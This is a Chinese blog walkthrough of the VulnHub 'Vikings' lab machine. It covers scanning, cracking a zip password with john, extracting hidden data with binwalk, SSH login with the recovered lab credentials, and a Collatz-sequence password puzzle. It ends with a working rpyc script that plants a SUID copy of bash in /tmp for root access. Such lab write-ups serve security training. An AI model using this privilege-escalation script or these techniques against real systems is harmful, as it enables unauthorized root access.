渗透测试 vulnhub靶场 Vikings

于 2024-06-06 09:37:03 发布
阅读量939 收藏 16
点赞数 9
分类专栏: 渗透测试 vulnhub靶机 文章标签: 网络 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47112073/article/details/139487274
版权

kali IP地址为192.168.127.128

靶机 IP地址为192.168.127.130

目录

一:信息搜集

1.1 扫描主机

1.2 端口扫描

1.3 端口访问

1.4 目录扫描

二:漏洞挖掘

2.1 发现文件

2.2 John密码破解

2.3 隐写查看

三:漏洞利用

3.1 SSH连接

3.2 考拉兹质数解密

四:提权

总结:

一:信息搜集

1.1 扫描主机

主机探测,发现靶机IP地址

1.2 端口扫描

端口扫描,扫描有哪些端口开放

1.3 端口访问

如上图,发现开放了  22  80端口,直接访问,没啥东西

1.4 目录扫描

没有发现什么目录,接着用gubuster进行路径爆破

发现war文件,打开查看一下发现war-is-over新目录

二:漏洞挖掘

2.1 发现文件

访问目录发现是一串base64编码,直接网站解密是解密不了的

所以尝试通过kali自带的解密方法直接下载,查看文件类型是zip压缩包文件

2.2 John密码破解

 先把文件放到桌面,直接使用zip2John提前密码信息,然后使用john进行密码爆破,

得到密码:

ragnarok123

如果出现以下问题,意思是/root/.john/john.rec文件被锁定。

通过测试只要把 /root/.john/john.rec这个文件删除就不会报错了。

所以可以通过以下命令。每两秒删除一次这个文件。

watch rm -rf /root/.john/john.rec

将文件解压,发现是一张图片        

2.3 隐写查看

对图片进行隐写查看

binwalk king                 --查看是否存在隐藏文件

binwalk -e king              --提权隐藏文件

出现以上问题怎么办?  不要慌,直接加权限,我已经是root权限了,但是识别不了,那就再叫权限

得到文件_king.extracted。进入文件夹发现存在user文件,查看存在一个ssh用户的用户名密码

账号:floki

密码:f@m0usboatbuilde7

三:漏洞利用

3.1 SSH连接

直接连接ssh,进行查看,发现在floki的用户当前目录发现两个文件cat /etc/passwd  并且还发现一个ragnar用户

3.2 考拉兹质数解密

查看readme文件里提示需要造船boat文件里面给出提示是考拉兹猜想,进行质数查找,编写简单的素数判断程序对第29个质数进行考拉兹计算后打印ASCII编码对应的字符串

直接写代码,对第29个质数进行考拉兹计算

n=109
a=[n]
while n != 1 :
    if n % 2 ==0:
        n = n/2
    else:
        n = n*3+1
    if n < 256:
        a.append(int(n))
print(a)

接下来就是解密,对10进行ascii 进行还原

得到密码:

mR)|>^/Gky[gz=.F#j5P

四:提权

用mR)|>^/Gky[gz=.F#j5P(登录ragnar账户

直接交互shell  

/bin/bash -i

查找运行的脚本文件

发现当前目录下的.profile文件

直接利用rpyc 提权

查看rpyc是否开放18812端口

因为rpyc是可以远程操控的我们直接利用这一点获取他的root权限
我们写一个脚本,让他自己连接,然后把root权限的bash复制一份给我们用

import rpyc
connect = rpyc.classic.connect('localhost')
def rootshell():
    import os
    os.system('rm /tmp/rootshell')
    os.system('cp /bin/bash /tmp/rootshell && chmod +s /tmp/rootshell')
conn = connect.teleport(rootshell)
conn()

运行一下后,会在/tmp目录下生成一个我们能运行的东西,具有root权限的东西

直接运行脚本获得root权限

总结:

1,探测主机

2,目录探测

3,密码破解-涉及到隐写,比较麻烦

4,质数解密

5,提权

大风呼呼的
关注
  • 9
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vikings-Bootstrap:使用引导程序的网站个人设计
04-11
Vikings-Bootstrap 是一个基于 Bootstrap 框架的个人网站设计项目,旨在展示如何利用 Bootstrap 的强大功能来创建引人入胜且响应式的网页。Bootstrap 是一个流行的开源前端开发框架,它提供了一系列预先设计的组件、...
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4586
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1663
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7423
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
小白渗透0-1:VulnHub靶场渗透记录:medium_soc
qq_49399033的博客
02-04 1120
攻击机:192.168.56.102(vmware os:windows 11)靶机:192.168.56.101(virtualbox)
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1413
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
Vulnhub靶机:DC-1渗透详细过程
IerkeU的博客
01-27 2737
这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。
POLYGON – Vikings Pack v1.3
09-08
Key Features - 221 unique assets with x4 alternative texture colors. - Customizable Viking Boat, Fishing Boat, Modular Buildings, Mountains, Table, Seat, Fish Pile, Modular Beach sections, Dirt mounds...
Vikings_In_England
03-15
【标题】"Vikings_In_England" 指的是关于维京人在英格兰的历史时期,这段历史涉及了北欧海盗对英格兰的入侵、定居、贸易以及文化影响。维京人,通常指的是9世纪到11世纪来自斯堪的纳维亚(包括挪威、瑞典和丹麦)的...
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
Vulnhub靶机:DC-3渗透详细过程
菜鸟学渗透
04-11 840
Vulnhub靶机:DC-3渗透详细过程
Vulnhub靶机 Noob:1打靶 渗透详细过程(萌新)
最新发布
m0_73981089的博客
05-16 1398
Vulnhub靶机搭建配置、设置虚拟机网络适配器、信息收集、信息分析、提权
靶机记录Beelzebub、Vikings、Deathnote
qq_287064772的博客
08-13 214
Beelzebub、Vikings、Deathnote
VulnHub渗透测试实战靶场 - Tomato
m0_74215510的博客
04-27 1207
靶机名称:tomato 靶机难度:中等到困难 虚拟机环境:VMware Workstation 15.x Pro(此靶机推荐使用VMware搭建) 目标:获取root shell,即(root@localhost:~#),然后获取/root下的flag 靶机地址:https://download.vulnhub.com/tomato/Tomato.ova
Vulnhub靶场渗透-theEther
paidx0
10-03 1252
前言 这次的靶机还是很好玩的,有点难度折腾了挺久,但方法对了那就很容易了 靶机ip(192.168.110.129) 攻击机ip(192.168.110.127) 网络NAT模式 不废话了直接开始 信息收集 打开网页简单看了看,没有过多的内容,是个基因的论文网站 网站没有太多的功能,而且扫目录也没扫到什么有价值的东西 最开始以为网站上的这些单词可能会用到,就利用他们做了个字典去爆破 ssh,显然我的方法就是错的 漏洞挖掘 注意到这个位置很有可能是利用存在读文件,简单尝试了几次Apache的日志文件
Vulnhub靶场渗透-Breach1.0
paidx0
09-08 1534
Vulnhub简介 Vulnhub是一个提供各种漏洞环境的一个靶场平台,大部分环境都是虚拟机镜像文件,预先设计各种漏洞 需要使用VMware或VirtualBox 运行,每个镜像都有破解的目标,从启动虚拟机到获取系统的 root 权限和查看 flag https://www.vulnhub.com/ Breach1.0靶机信息 breach1.0 是一个难度初级到中级的Boot2Root/CTF挑战 静态ip(192.168.110.140),配置环境到同一个网段,我用的kali (192.168.110.
Vulnhub靶场渗透-basic_pentesting_1
paidx0
09-22 639
前言 靶机ip(192.168.110.134) 攻击机ip(192.168.110.127) 网络NAT模式 这次的靶场比较简单,却绕了挺大弯的 信息收集 找到隐藏页 简单翻了一下也没啥可以利用的东西,继续扫隐藏页目录 找到一些看似有用其实没啥用的东西,比如WordPress的登录页,文件包含页 这全都是误导,显然我被骗了,一直在爆破登录页和一个一个文件的看,文件数量太多了浪费很多时间 正确解法 重新回到nmap,这次不偷懒,更详细的扫描一下服务的版本号 nmap -A -v 192.168
and I want to know more about the political impact of the viking age
03-28
The Viking Age had a significant political impact on Europe. The Vikings were known for their raids and conquests, which spread fear and uncertainty throughout the continent. This led to the formation of powerful kingdoms and the development of stronger political structures. The Vikings played a significant role in the formation of the Normans, who conquered England in 1066. The Normans were originally Vikings who had settled in the region of Normandy in France, and they brought with them the same military tactics and strategies that had made them successful in their raids. The Vikings also had a significant impact on the Scandinavian countries, where they established kingdoms and dynasties that lasted for centuries. In Norway, the Viking chieftains gradually consolidated their power and established a centralized monarchy. In Denmark, the Viking kings were able to unite the various tribes and establish a strong kingdom. The Viking Age also had an impact on the development of trade and commerce. The Vikings were skilled traders and merchants, and their raids and conquests opened up new trade routes and markets. This led to the development of a more complex economy and the growth of cities and towns. Overall, the political impact of the Viking Age was significant, and it helped shape the political landscape of Europe for centuries to come.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值